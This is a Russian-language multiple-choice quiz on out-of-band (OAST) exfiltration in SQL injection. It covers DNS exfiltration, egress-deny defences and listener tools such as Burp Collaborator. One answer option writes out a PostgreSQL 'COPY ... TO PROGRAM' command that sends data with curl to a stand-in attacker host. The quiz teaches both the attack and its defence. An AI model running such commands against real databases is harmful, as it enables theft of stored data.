4. OAST механики

В каком случае хакер прибегает к Out-of-Band (OOB) эксфильтрации данных?

Когда он хочет ускорить рендеринг страницы Когда SQL-запросы слишком короткие Когда сервер НЕ возвращает данные напрямую (In-Band) и Blind-канал (поведение сайта) нестабилен или закрыт; хакер заставляет СУБД саму отправить данные на его сервер Когда он забыл пароль администратора

Что такое OAST (Out-of-band Application Security Testing)?

Тестирование мобильных приложений через SMS Метод атаки, при котором информация от цели передается по отдельному каналу (DNS, HTTP), не связанному с основным каналом инъекции Проверка скорости работы базы данных на Linux Автоматическое удаление всех логов

Как данные передаются хакеру через DNS-эксфильтрацию?

Хакер взламывает ваш роутер СУБД пытается резолвить поддомен, содержащий украденные данные (например, password123.attacker.com); хакер видит этот запрос в логах своего DNS-сервера Хакер меняет ваш IP на 8.8.8.8 База данных пересылает JSON по почте

Какая команда в PostgreSQL (при наличии прав) позволяет хакеру выполнить системную команду `curl` и отправить данные на свой сервер?

SELECT http_get('...') UPDATE pg_settings SET ... COPY ... TO PROGRAM 'curl http://attacker.com/$(data)' FETCH secrets

Что является самым надежным сетевым барьером против Out-of-Band эксфильтрации в Kubernetes или Docker?

Переименование всех таблиц в базе Установка пароля на DNS Network Policies (Egress Deny); запрет любых исходящих соединений от пода с базой данных во внешний мир Отключение порта 80

Верно ли утверждение: "Если мое Go-приложение не имеет доступа в интернет, то база данных тоже находится в безопасности от OOB атак"?

Да, интернет на сервере один на всех Да, но только если база на SQLite НЕТ, база данных — это отдельный процесс/контейнер. Если у неё есть свой доступ во внешний мир (Egress), хакер вытащит данные напрямую из неё Нет, база данных сама является интернетом

Какой инструмент чаще всего используется хакерами (или пентестерами) для приема OOB-запросов от уязвимых БД?

Google Analytics Burp Collaborator / Interactsh Microsoft Outlook Wireshark на локальном компьютере